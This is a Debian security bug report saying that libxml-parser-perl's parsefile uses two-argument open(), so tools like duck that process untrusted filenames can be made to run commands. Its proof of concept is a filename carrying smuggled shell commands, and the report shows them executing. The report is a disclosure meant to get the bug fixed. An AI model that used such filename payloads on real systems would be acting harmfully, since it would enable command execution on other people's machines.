Package: libxml-parser-perl
Version: 2.44-2+b4
Tags: security
Control: affects -1 check-all-the-things duck
The XML::Parser::parsefile function uses 2-argument open().
As a consequence, users of this function can't use it to securely check
files with untrusted names. (Unless the users sanitize the filenames
themselves, which they don't, because AFAICT this behavior is not
documented.)
Proof of concept:
$ touch '; false .appdata; cowsay pwned >&2; kill $PPID |'
$ duck
sh: 1: ./: Permission denied
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Terminated
-- System Information:
Architecture: i386
Versions of packages libxml-parser-perl depends on:
ii perl 5.28.1-4
ii libc6 2.28-7
ii libexpat1 2.2.6-1
ii liburi-perl 1.76-1
ii libwww-perl 6.36-1
--
Jakub Wilk
